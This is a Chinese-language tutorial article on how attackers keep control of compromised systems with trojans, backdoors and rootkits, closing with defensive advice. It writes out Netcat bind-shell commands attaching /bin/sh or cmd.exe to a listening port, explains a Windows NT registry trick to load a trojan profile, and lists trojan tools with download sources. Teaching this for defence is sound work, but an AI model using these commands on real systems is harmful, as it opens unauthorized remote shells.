62、网络攻击中的巩固手段：外国代码的威胁

网络攻击中的巩固手段：外国代码的威胁

在网络攻击领域，攻击者为了巩固对特定资源的控制，常常会采用各种手段，其中引入“外国代码”是一种常见且有效的方式。本文将详细介绍“外国代码”中的特洛伊木马、后门程序等相关内容，以及它们在网络攻击中的应用和特点。

1. SNMP 侦察工具

在网络攻击的前期，侦察是非常重要的一环。SNMP（简单网络管理协议）侦察工具可以帮助攻击者获取网络设备的相关信息。以下是一些常见的 SNMP 侦察工具：
| 工具（作者） | 来源 | 描述 |
| — | — | — |
| Sncs（Delorean） | http://packetstormsecurity.nl/sniffers/ | SNMP 社区名称嗅探器 |
| snmpbrute | http://www.securiteam.com/tools/5EP0N154UC.html | 用于暴力破解 SNMP 社区字符串的工具 |
| snmputil | Windows NT 和 Windows 2000 资源工具包 | 允许对运行 SNMP 服务的主机进行 SNMP 查询 |
| Snmpscan（Knight, phunc） | http://packetstormsecurity.org | 扫描运行 SNMP 的主机或路由器，查找常见社区（密码） |
| snmpsniff | http://www.AntiCode.com/archives/network - sniffers/snmpsniff - 1_0.tgz | SNMP 嗅探器 |
| snmpwalk | http://www.zend.com/manual/function.snmpwalk.php | 从主机获取所有 SNMP 对象的工具 |
| snoopy | http://packetstormsecurity.org | 用 Perl 编写的简单 SNMP 扫描器，若找到有效社区字符串，将报告系统 ID |
| SolarWinds | http://www.solarwinds.net | SNMP 浏览器 |

2. 外国代码概述

“外国代码”主要包括特洛伊木马、后门程序、rootkit 和内核级 rootkit 等。这些代码的引入可以让攻击者摆脱对系统或网络管理员直接控制的资源的依赖，从而更隐蔽地维持对目标系统的访问。例如，添加或修改系统账户、直接操纵其他系统资源可能会被警觉的管理员发现，而安装后门或 rootkit 可能在一段时间内不被察觉，尤其是当软件通过对操作系统进行大量修改来隐藏自身存在时。

3. 特洛伊木马

特洛伊木马是一种恶意软件程序，它通常隐藏在合法或看似无害的软件中。一旦触发，特洛伊木马会执行一些隐藏或明显的功能，如格式化硬盘、安装数据包嗅探器或击键记录器，或建立后门监听器。与病毒不同，特洛伊木马一旦激活不会自我复制。

常见的特洛伊木马形式包括：
- 特洛伊登录程序 ：攻击者通常将其用作标准登录程序（如 /bin/login）的替代品，以收集账户/密码信息。
- 特洛伊进程 ：通过 DLL 注入等方法“修补”正在执行的进程，以扩展或替换特定进程功能。
- 特洛伊后门 ：旨在通过附加到命令行 shell 或 Windows 界面的后门监听器，为目标系统提供持续访问。
- 特洛伊库 ：可用于修改特定操作系统二进制文件或应用程序的库环境，有效改变或扩展程序的功能。
- 特洛伊注册表键 ：可能被植入 NT/2000 系统注册表中，以改变操作系统或应用程序环境的特定方面的功能。
- 特洛伊设备 ：攻击者可能安装特洛伊设备（或设备驱动程序）来操纵或修改设备功能，如文件系统设备或网卡。
- 特洛伊 shell ：可安装到目标系统，以方便对系统的后门访问或用于收集侦察信息。
- Rootkit ：在大多数黑客/安全参考资料中单独列出，但本质上是特洛伊二进制文件的集合，旨在为隐藏攻击者在系统上的存在提供全面工具。

特洛伊木马的传播方式多种多样，常见的有 SMTP、HTTP/FTP 和 Internet 中继聊天（IRC）等。许多特洛伊木马以附加到看似合法软件的形式进行安装，当最终用户或管理员安装“合法”软件时，后门会同时被静默安装。

以下是一个利用 Windows NT 系统漏洞安装特洛伊用户配置文件的示例：
当用户登录到 Windows NT 系统时，会在 HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList 中写入一个子键，代表用户的安全标识符（SID）。该键中的一个值是 ProfileImagePath，它指向用户配置文件目录的位置。默认情况下，该键的权限允许任何用户进行“setvalue”操作，即编辑该子键及其子键中的信息。攻击者可以利用这一权限更改账户的 ProfileImagePath，强制加载特洛伊配置文件，该配置文件会在用户下次登录系统时从“启动”文件夹中的条目启动特洛伊代码。在 Windows NT 4.0 中，攻击者可以使用 NT 资源工具包的 reg.exe 等工具在网络上进行此类注册表编辑，并影响具有广泛系统权限的账户，如管理员账户。

安装到目标系统后，特洛伊木马可能会执行以下活动或提供以下功能：
- 文件系统操作 ：文件读取、写入、删除、权限更改等。
- 数据包嗅探 ：安装某种形式的数据包嗅探器，用于收集网络侦察信息。
- 击键记录 ：安装击键记录器，用于收集账户/密码或其他击键信息。
- 后门监听器 ：旨在方便对目标系统进行远程访问的特洛伊木马通常会安装后门监听器，以提供对系统的持续交互式访问。
- 隐蔽通道 ：特洛伊木马通常提供通过边界访问控制设备将流量隧道传输出系统的功能，可使用专有协议或标准协议，如 HTTP 或 SSH。隐蔽通道可用于将数据传递到远程代理或建立客户端到服务器的通信通道。
- 拒绝服务或分布式拒绝服务 ：可用于对目标系统进行拒绝服务攻击，或构建分布式拒绝服务活动的通信通道。

以下是两个具体的特洛伊木马示例：
- ACKcmd ：由 Arne Vidstrom 创建，旨在通过利用 TCP ACK 段进行通信，穿透简单的数据包过滤边界网络防御。简单的数据包过滤防火墙在应用规则库时针对 SYN 段且不构建状态表，可能会放行未连接到合法 TCP 会话的非法 ACK 段。攻击者可以将 ACKcmd 特洛伊木马通过邮件发送给用户，并“说服”用户将其作为看似良性的附件执行。ACKcmd 的“客户端”部分使用 ACK 段与服务器（目标系统）进行通信，反之亦然。它提供一个简单的 Windows 命令提示符，默认使用 TCP 80 作为源端口，试图将特洛伊通道伪装成正常的 HTTP 响应流量。
- Win32.Tasmer.B（也称为 srvcp 特洛伊木马） ：旨在利用 IRC 为目标系统提供远程访问。一旦目标系统感染了 W32.Tasmer.B，它会主动连接到 IRC（实际上是 irc.mcs.net 上的特定 IRC 通道），并等待命令。连接到 IRC 后，特洛伊木马会扫描接收到的消息，查找它可以解释的命令，如通过 FTP 接收/发送文件、执行文件或更改其 IRC 身份。该特洛伊木马通过 srvcp.exe 文件安装，它会在 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Service Profiler 中创建一个注册表键，确保系统每次启动时特洛伊木马都会启动。安装后，特洛伊木马会尝试连接到 irc.mcs.net 上的 TCP 端口 6666 或 6667，以及一系列其他 Internet IRC 服务器上的特定 IRC 通道。成功建立 IRC 连接后，IRC 服务器会向受感染的客户端发送身份请求，以获取其身份信息。特洛伊木马随后会加入特定的 IRC 通道，并等待攻击者通过 IRC 发出的命令。

以下是一些常见的特洛伊木马工具：
| 特洛伊木马 | 来源 | 描述 |
| — | — | — |
| ACKcmd | http://ntsecurity.nu/toolbox/ackcmd/ | 利用 TCP ACK 段通过边界防火墙和访问控制设备进行通信的特洛伊木马应用程序 |
| Back Orifice | http://www.cultdeadcow.com/ | 适用于 Microsoft 平台的特洛伊木马后门 |
| FakeGINA | http://ntsecurity.nu/toolbox/fakegina/ | 特洛伊化的登录程序 |
| Liberty crack | http://www.palmstation.com/view_article.py?article = 2826 | 适用于 Palm OS（PDA）平台的特洛伊木马，删除所有 Palm 应用程序 |
| Subseven | http://209.100.212.5/cgi - bin/search/search.cgi?searchvalue = subseven&type = archives | Subseven 远程访问/远程控制特洛伊木马 |
| VBA trojan | http://www.megasecurity.org/Info/Vba_Trojan.txt | 利用宏功能感染 Microsoft Access 文件的 Visual Basic 特洛伊木马 |

4. 后门程序（和特洛伊后门）

后门程序和特洛伊后门是外国代码的一种，它们为远程入侵者提供对系统（或网络）的隐蔽、持续访问，绕过现有的安全控制。通过在系统或网络环境中插入后门，攻击者可以更自由地维持对资源的持续访问，而无需依赖可能被管理员检测或删除的操作系统或网络设备机制。

特洛伊后门是特洛伊软件的一个子集，代表附加到（看似）“合法”软件的特洛伊代码，当代码执行时，会静默地为系统或网络安装后门。

后门程序可能提供基于图形用户界面（GUI）的全功能远程控制，类似于商业远程访问软件（如 VNC 或 PCAnywhere），或者提供一个后门网络监听器，允许通过交互式 shell 执行命令。

5. 后门监听器

创建后门“监听器”需要使用实用程序或后门程序，该程序可以在系统上启动一个网络监听器，监听特定网络端口的客户端连接。如果监听器可以在黑客的控制下启动和关闭，并有效地隐藏在系统中，它可以为系统或网络提供持续的无限制通道。

Netcat 是建立系统后门监听器最常用的工具之一。它最初由 Hobbit 为 UNIX 平台编写，1998 年 2 月由 Weld Pond 为 NT 重写。两个版本都提供相同的基本功能，即通过 TCP 和 UDP 网络连接读写原始数据。

Netcat 可以作为客户端连接到现有的 TCP/UDP 网络监听器并读写数据，例如：

nc <server> 139

Netcat 也可以作为服务器端服务启动，从而在系统上建立后门监听器：

nc –l –p 5678

Netcat 作为后门监听器具有以下优点：
- 调用本地应用或 shell ：可以作为“服务器端”监听器启动，并带有调用本地应用程序或交互式 shell/login 程序（如 /bin/sh 或 cmd.exe）的选项。这允许远程黑客建立一个附加到 Netcat 监听器（任何 TCP 或 UDP 端口）的应用程序，用于接受客户端连接。如果是 shell，“客户端”将自动以启动 Netcat 时使用的账户权限连接到 shell，例如：

nc –l –p 5678 –e/bin/sh
nc –l –p 5678 –e cmd.exe

• 高效数据传输 ：Netcat 原生支持高效地在网络连接上推送数据，几乎就像直接读写文件或“管道”一样。这使得它比需要特定客户端应用程序连接的标准网络端口更适合作为后门。Netcat 监听器还支持在网络上高效传输文件，例如：

nc –l –p 5678 < filename
nc server 5678 > filename

• 支持多种端口 ：Netcat 支持 TCP 和 UDP 端口，这为黑客提供了更多选择，可以选择一个知名端口（如 DNS [UDP/53]）来绕过网络（或系统）访问控制。例如：

<server> nc –l –p 5678
<client> nc <server> 5678 –e/bin/sh

• 数据转储 ：Netcat 可以创建网络连接接收到的所有输出的十六进制“转储”。构建一个监听客户端连接并将原始网络数据转储到文件的“后门”Netcat 监听器，是进行客户端侦察的有效手段，例如：

nc –l –p 5678 > filename

Cd00r 是另一个附加到 shell 的后门监听器示例，它在隐藏监听器存在方面有独特的方法。大多数后门监听器的一个关键缺点是，其存在可以通过分析网络监听器表（使用 netstat 等工具）或对目标主机运行端口扫描器来检测。监听器主要有两种类型：非混杂模式（在专用端口上运行）或混杂模式，但即使是混杂模式的监听器也可以通过检查主机网络设备上的混杂模式标志或运行 AntiSniff 等工具来检测。Cd00r 通过在非混杂模式下建立一个嗅探器来弥补这一不足，该嗅探器在接口上等待特定的数据包序列到达后才启动后门监听器。数据包序列可以由攻击者确定，可能是使用 Nmap 等工具向特定端口发送的 SYN 数据包序列，或使用专有工具。默认情况下，一旦激活，Cd00r 会启动 inetd 监听。

综上所述，了解这些网络攻击手段和工具对于网络安全防护至关重要。企业和个人应加强安全意识，采取有效的防护措施，如安装防火墙、入侵检测系统、定期更新软件等，以抵御这些潜在的威胁。

graph LR
    A[网络攻击] --> B[侦察阶段]
    B --> C[使用SNMP侦察工具]
    A --> D[引入外国代码]
    D --> E[特洛伊木马]
    D --> F[后门程序]
    E --> G[多种形式的特洛伊木马]
    F --> H[后门监听器]
    H --> I[Netcat]
    H --> J[Cd00r]

以上流程图展示了网络攻击的一般流程，从侦察阶段开始，使用 SNMP 侦察工具获取信息，然后引入外国代码，包括特洛伊木马和后门程序，其中后门程序又涉及到不同类型的后门监听器，如 Netcat 和 Cd00r。

网络攻击中的巩固手段：外国代码的威胁

6. 特洛伊木马与后门程序的传播及危害

特洛伊木马和后门程序的传播途径多样，危害巨大。它们不仅会导致用户的敏感信息泄露，还可能对系统和网络造成严重破坏。

传播途径主要包括：
- 邮件传播 ：攻击者将特洛伊木马伪装成正常的邮件附件，诱使用户下载并执行。例如，ACKcmd 就可能通过邮件分发给目标系统的用户。
- 软件捆绑 ：把特洛伊代码附加到看似合法的软件中，当用户安装该软件时，后门程序会被静默安装。
- 网络下载 ：利用用户对免费软件、共享软件的需求，在下载过程中植入特洛伊木马或后门程序。

这些恶意代码带来的危害有：
- 信息泄露 ：通过击键记录、数据包嗅探等功能，收集用户的账户密码、个人隐私等信息。
- 系统控制 ：攻击者可以利用后门程序远程控制目标系统，执行各种操作，如文件删除、修改系统配置等。
- 拒绝服务攻击 ：发动拒绝服务或分布式拒绝服务攻击，使目标系统或网络无法正常工作。

7. 应对特洛伊木马和后门程序的防护策略

为了有效抵御特洛伊木马和后门程序的攻击，需要采取一系列的防护策略。

7.1 技术防护

• 防火墙 ：配置防火墙规则，限制网络流量，阻止非法的连接请求。例如，设置规则允许 HTTP 出站流量，拒绝所有入站连接尝试（TCP SYN 数据包）。
• 入侵检测系统（IDS）/入侵防御系统（IPS） ：实时监测网络和系统活动，检测并阻止潜在的攻击行为。
• 杀毒软件 ：定期更新病毒库，对系统进行全面扫描，及时发现并清除特洛伊木马和后门程序。

7.2 安全配置

• 系统更新 ：及时安装操作系统和应用程序的补丁，修复已知的安全漏洞。
• 权限管理 ：合理分配用户权限，避免赋予过高的权限，减少攻击者利用权限漏洞的风险。
• 注册表监控 ：定期检查系统注册表，防止特洛伊注册表键被植入。

7.3 用户意识

• 安全意识培训 ：提高用户对网络安全的认识，教育用户不随意下载和执行不明来源的软件。
• 谨慎操作 ：在打开邮件附件、下载软件时，仔细确认来源和安全性。

8. 总结与展望

随着网络技术的不断发展，特洛伊木马和后门程序的攻击手段也在不断演变。攻击者会利用新的技术和漏洞，开发出更隐蔽、更具破坏力的恶意代码。因此，网络安全防护工作是一个持续的过程，需要不断地更新防护策略和技术手段。

为了更好地应对未来的网络安全挑战，我们需要加强以下几个方面的工作：
- 技术创新 ：研发更先进的安全检测和防护技术，提高对新型恶意代码的识别和抵御能力。
- 信息共享 ：加强企业、安全机构之间的信息共享，及时了解最新的攻击动态和应对方法。
- 法规建设 ：完善网络安全相关的法律法规，加大对网络攻击行为的打击力度。

graph LR
    A[防护策略] --> B[技术防护]
    A --> C[安全配置]
    A --> D[用户意识]
    B --> E[防火墙]
    B --> F[IDS/IPS]
    B --> G[杀毒软件]
    C --> H[系统更新]
    C --> I[权限管理]
    C --> J[注册表监控]
    D --> K[安全意识培训]
    D --> L[谨慎操作]

以上流程图展示了应对特洛伊木马和后门程序的防护策略体系，包括技术防护、安全配置和用户意识三个方面，每个方面又包含了具体的防护措施。

表 1：常见防护措施总结
| 防护类别 | 具体措施 | 作用 |
| — | — | — |
| 技术防护 | 防火墙 | 限制网络流量，阻止非法连接 |
| 技术防护 | IDS/IPS | 实时监测攻击行为 |
| 技术防护 | 杀毒软件 | 扫描并清除恶意代码 |
| 安全配置 | 系统更新 | 修复安全漏洞 |
| 安全配置 | 权限管理 | 合理分配用户权限 |
| 安全配置 | 注册表监控 | 防止注册表被篡改 |
| 用户意识 | 安全意识培训 | 提高用户安全认识 |
| 用户意识 | 谨慎操作 | 避免下载执行不明软件 |

通过以上的分析和总结，我们可以更全面地了解特洛伊木马和后门程序的特点、传播途径、危害以及应对措施。在实际的网络环境中，我们要综合运用各种防护手段，构建多层次的安全防护体系，以保障网络和系统的安全稳定运行。